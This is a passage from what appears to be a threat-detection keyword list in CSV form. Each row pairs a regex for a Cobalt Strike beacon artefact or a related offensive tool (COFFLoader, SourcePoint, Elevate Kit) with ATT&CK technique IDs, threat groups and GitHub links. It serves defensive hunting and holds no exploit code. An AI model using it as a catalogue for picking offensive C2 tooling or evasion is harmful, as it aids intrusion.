- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*beacon.ps1*beacon.exe*",".{0,1000}beacon\.ps1.{0,1000}beacon\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*beacon.x64*.dll*",".{0,1000}beacon\.x64.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.x64*.exe*",".{0,1000}beacon\.x64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.x64.dll*",".{0,1000}beacon\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*beacon.x86*.dll*",".{0,1000}beacon\.x86.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon.x86*.exe*",".{0,1000}beacon\.x86.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_api.h*",".{0,1000}beacon_api\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","0","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*beacon_bottom *",".{0,1000}beacon_bottom\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Beacon_Com_Struct*",".{0,1000}Beacon_Com_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_command_describe*",".{0,1000}beacon_command_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_command_detail(""remotepipelist""*",".{0,1000}beacon_command_detail\(\""remotepipelist\"".{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*beacon_command_detail*",".{0,1000}beacon_command_detail.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*beacon_command_detail*",".{0,1000}beacon_command_detail.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_command_register*",".{0,1000}beacon_command_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*beacon_command_register*",".{0,1000}beacon_command_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_commands*",".{0,1000}beacon_commands.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_compatibility.c*",".{0,1000}beacon_compatibility\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_compatibility.h*",".{0,1000}beacon_compatibility\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_elevator_describe*",".{0,1000}beacon_elevator_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_describe*",".{0,1000}beacon_elevator_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 